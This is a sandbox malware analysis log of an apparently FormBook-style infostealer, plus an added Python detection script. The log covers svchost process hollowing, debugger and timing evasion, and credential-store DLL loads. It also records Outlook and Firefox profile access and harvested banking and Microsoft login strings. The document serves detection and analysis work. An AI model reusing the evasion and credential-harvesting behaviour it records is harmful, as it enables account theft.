                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\Atuserer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
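                The process tree and module-load rows above carry the two observations a detection engineer would want to encode: RO2Y11yOJ7.exe starts C:\Windows\SysWOW64\svchost.exe with the dropper's own path as the command line (an svchost.exe that was neither started by services.exe nor launched as svchost.exe), and Atuserer.exe, started from a randomly named Program Files (x86) directory, loads winsqlite3.dll, vaultcli.dll and dpapi.dll before the Firefox profiles.ini read and the Outlook profile key access. The Python below is an added example, not part of the Joe Sandbox report or of any vendor tooling; its event records are constructed from the rows above, and the PIDs, the parent of the initial sample (explorer.exe) and the benign svchost.exe baseline row are assumptions.

```python
"""Added example (not from the Joe Sandbox report): two heuristics over process-creation
and module-load events, modelled on this analysis' process tree and "Section loaded" rows.
Sample events are constructed; PIDs, the initial parent and the baseline row are assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List
import ntpath


@dataclass
class ProcessEvent:
    pid: int
    image: str                 # full path of the executable image on disk
    cmdline: str               # command line recorded at process creation
    parent_image: str          # full path of the creating process
    loaded_modules: List[str] = field(default_factory=list)


# Constructed from the report's "Process created" and "Section loaded" rows.
# PID 9 is an assumed benign service host so the rules can be shown not to fire on it.
SAMPLE_EVENTS = [
    ProcessEvent(2, r"C:\Users\user\Desktop\RO2Y11yOJ7.exe",
                 r'"C:\Users\user\Desktop\RO2Y11yOJ7.exe"',
                 r"C:\Windows\explorer.exe",                        # assumed parent
                 ["wsock32.dll", "wininet.dll", "iphlpapi.dll"]),
    ProcessEvent(4, r"C:\Windows\SysWOW64\svchost.exe",
                 r'"C:\Users\user\Desktop\RO2Y11yOJ7.exe"',         # dropper's path as cmdline
                 r"C:\Users\user\Desktop\RO2Y11yOJ7.exe"),
    ProcessEvent(7, r"C:\Windows\SysWOW64\Atuserer.exe",
                 r'"C:\Windows\SysWOW64\Atuserer.exe"',
                 r"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe",
                 ["wininet.dll", "winsqlite3.dll", "vaultcli.dll", "dpapi.dll", "cryptbase.dll"]),
    ProcessEvent(9, r"C:\Windows\System32\svchost.exe",              # assumed benign baseline
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p",
                 r"C:\Windows\System32\services.exe",
                 ["rpcrt4.dll"]),
]

# DLLs needed to read Chromium "Login Data" (SQLite), the Windows Credential Vault and
# DPAPI-protected blobs. Browsers and mail clients load these legitimately; an unrelated
# binary loading two or more of them is the signal.
CREDENTIAL_STORE_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}
BROWSER_OR_MAIL = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}


def cmdline_image(cmdline: str) -> str:
    """Return the first token of a Windows command line, honouring a quoted path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def check_svchost_masquerade(ev: ProcessEvent) -> List[str]:
    """A genuine svchost.exe is started by services.exe and its command line names svchost.exe."""
    findings: List[str] = []
    if ntpath.basename(ev.image).lower() != "svchost.exe":
        return findings
    if ntpath.basename(ev.parent_image).lower() != "services.exe":
        findings.append("svchost.exe not started by services.exe")
    if ntpath.basename(cmdline_image(ev.cmdline)).lower() != "svchost.exe":
        findings.append("svchost.exe command line names a different image")
    return findings


def check_credential_store_access(ev: ProcessEvent) -> List[str]:
    """Flag a non-browser, non-mail process that loads two or more credential-store DLLs."""
    name = ntpath.basename(ev.image).lower()
    hits = CREDENTIAL_STORE_DLLS & {m.lower() for m in ev.loaded_modules}
    if name not in BROWSER_OR_MAIL and len(hits) >= 2:
        return ["non-browser process loaded credential-store DLLs: " + ", ".join(sorted(hits))]
    return []


def triage(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Run both checks over a batch of events; returns pid -> findings for pids that fired."""
    report: Dict[int, List[str]] = {}
    for ev in events:
        findings = check_svchost_masquerade(ev) + check_credential_store_access(ev)
        if findings:
            report[ev.pid] = findings
    return report


if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, findings)
```

                Run as-is it reports PID 4 (both svchost conditions) and PID 7 (the credential-store DLL set) and stays silent on the dropper's own process and the baseline service host. The two svchost conditions are deliberately independent: either one alone is enough for FormBook-style hollowing, where the image on disk is svchost.exe but the command line is inherited from the injecting parent. Extend BROWSER_OR_MAIL with whatever legitimate credential consumers exist in the environment before deploying the second rule.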
                Source: RO2Y11yOJ7.exe | Static file information: File size 1324032 > 1048576
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RO2Y11yOJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avRLXQyosx.exe, 00000006.00000002.3160751775.000000000094E000.00000002.00000001.01000000.00000005.sdmp, avRLXQyosx.exe, 00000008.00000000.1743911480.000000000094E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: ATuserer.pdb source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATuserer.pdbGCTL source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: RO2Y11yOJ7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RO2Y11yOJ7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RO2Y11yOJ7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RO2Y11yOJ7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RO2Y11yOJ7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003BC104 LoadLibraryA,GetProcAddress, 2_2_003BC104
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_0034C590 push eax; retn 0034h 2_2_0034C599
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00368AC5 push ecx; ret 2_2_00368AD8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004CD943 push edi; iretd 4_2_004CD944
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C1921 push ebx; ret 4_2_004C192D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D418E push ds; ret 4_2_004D41B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2192 push ss; retf 4_2_004C219A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D9247 pushfd ; ret 4_2_004D9248
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D1A08 push es; ret 4_2_004D1BFF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004CDA80 push ebp; ret 4_2_004CDA83
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D1B71 push es; ret 4_2_004D1BFF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004CD39A push edi; retf 4_2_004CD39B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004CD5F1 push ebx; retf 4_2_004CD65A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C3580 push eax; ret 4_2_004C3582
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004DAE19 push es; retf 4_2_004DAE28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F0225F pushad ; ret 4_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F027FA pushad ; ret 4_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F0283D push eax; iretd 4_2_02F02858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F309AD push ecx; mov dword ptr [esp], ecx 4_2_02F309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F01368 push eax; iretd 4_2_02F01369
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B09AD push ecx; mov dword ptr [esp], ecx 7_2_048B09B6
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_008322BD push 6EA33E55h; retf 7_2_008322D4
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0082E485 push es; ret 7_2_0082E67C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0082E5EE push es; ret 7_2_0082E67C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00830C0B push ds; ret 7_2_00830C35
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00843289 pushfd ; ret 7_2_0084328E
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_008413F8 push es; ret 7_2_0084140A
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00837896 push es; retf 7_2_008378A5
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00843837 push eax; retf 7_2_00843852
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00835CC4 pushfd ; ret 7_2_00835CC5
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00839E58 push esp; retf 7_2_00839E5A
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046D74A8 push cs; iretd 7_2_046D74AC
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00344A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00344A35
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003C53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_003C53DF
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00363307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00363307
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\Atuserer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | API/Special instruction interceptor: Address: 24E3234
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\Atuserer.exe | API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F7096E rdtsc 4_2_02F7096E
                Source: C:\Windows\SysWOW64\Atuserer.exe | Window / User API: threadDelayed 9332
                Source: C:\Windows\SysWOW64\Atuserer.exe | Window / User API: threadDelayed 640
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | API coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\Atuserer.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240 | Thread sleep count: 9332 > 30
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240 | Thread sleep time: -18664000s >= -30000s
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240 | Thread sleep count: 640 > 30
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240 | Thread sleep time: -1280000s >= -30000s
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe TID: 5836 | Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe TID: 5836 | Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\Atuserer.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A449B GetFileAttributesW,FindFirstFileW,FindClose, 2_2_003A449B
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AC75D FindFirstFileW,FindClose, 2_2_003AC75D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_003AC7E8
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_003AF021
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_003AF17E
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_003AF47F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_003A3833
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_003A3B56
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003ABD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_003ABD48
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0083C4F0 FindFirstFileW,FindNextFileW,FindClose, 7_2_0083C4F0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00344AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00344AFE
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 00X412J3.7.dr | Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: 00X412J3.7.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 00X412J3.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 00X412J3.7.dr | Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: avRLXQyosx.exe, 00000008.00000002.3161015681.000000000114F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                Source: 00X412J3.7.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 00X412J3.7.dr | Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 00X412J3.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 00X412J3.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: firefox.exe, 0000000C.00000002.2020563070.000002CCF1D4D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
                Source: 00X412J3.7.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 00X412J3.7.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 00X412J3.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 00X412J3.7.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 00X412J3.7.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 00X412J3.7.dr | Binary or memory string: global block list test formVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 00X412J3.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 00X412J3.7.dr | Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 00X412J3.7.dr | Binary or memory string: discord.comVMware20,11696501413f
                Source: 00X412J3.7.dr | Binary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\Atuserer.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F7096E rdtsc 4_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D7A13 LdrLoadDll, 4_2_004D7A13
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003B401F BlockInput, 2_2_003B401F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00343B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 2_2_00343B4C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00375BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_00375BFC
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003BC104 LoadLibraryA,GetProcAddress, 2_2_003BC104
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_024E34A0 mov eax, dword ptr fs:[00000030h] 2_2_024E34A0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_024E3500 mov eax, dword ptr fs:[00000030h] 2_2_024E3500
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_024E1E70 mov eax, dword ptr fs:[00000030h] 2_2_024E1E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F402E1 mov eax, dword ptr fs:[00000030h] 4_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03008324 mov eax, dword ptr fs:[00000030h] 4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03008324 mov ecx, dword ptr fs:[00000030h] 4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0300634F mov eax, dword ptr fs:[00000030h] 4_2_0300634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F402A0 mov eax, dword ptr fs:[00000030h] 4_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F6E284 mov eax, dword ptr fs:[00000030h] 4_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB0283 mov eax, dword ptr fs:[00000030h] 4_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h] 4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F34260 mov eax, dword ptr fs:[00000030h] 4_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2826B mov eax, dword ptr fs:[00000030h] 4_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2A250 mov eax, dword ptr fs:[00000030h] 4_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F36259 mov eax, dword ptr fs:[00000030h] 4_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FEA250 mov eax, dword ptr fs:[00000030h] 4_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB8243 mov eax, dword ptr fs:[00000030h] 4_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 4_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2823B mov eax, dword ptr fs:[00000030h] 4_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F663FF mov eax, dword ptr fs:[00000030h] 4_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h] 4_2_02F403E9
